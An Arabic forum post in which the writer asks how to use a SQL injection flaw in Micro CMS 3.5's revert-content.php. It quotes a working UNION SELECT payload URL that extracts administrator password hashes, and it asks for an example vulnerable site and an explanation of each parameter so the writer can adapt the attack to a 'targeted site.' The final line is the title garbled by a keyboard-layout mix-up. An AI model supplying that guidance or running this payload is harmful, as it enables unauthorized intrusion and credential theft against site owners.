بسم الله الرحمن الرحيم
انا كنت عملت موضوع سالت فيه عن استغلال السغرة
Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability
ولكن يبدو اني قد اخطاءت في طريقة السوال
فان اقصد
شرح الاستغلال مثال
http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SE LECT%20null,null,SUBSTRING(administrators_pass,1,1 6),null,null%20FROM%20microcms_administrators/*
================================================== ================================================== ================================================== ======================================
هذا هو الاستغلال
site.com= الموقع المصاب
فماذا يقصد ب
newest=؟
او بمعني اخر كيفيتة تريكب السغرة
ارجو اضافة موقع علي الثغرة
وكافة المتغيرات بحيث استطيع فهم السغرة ووضع متغيرات موقعي المستهدف
وشكرا لكم
v[hx avp hsjyghg Micro CMS 3>5 (revert-content>php)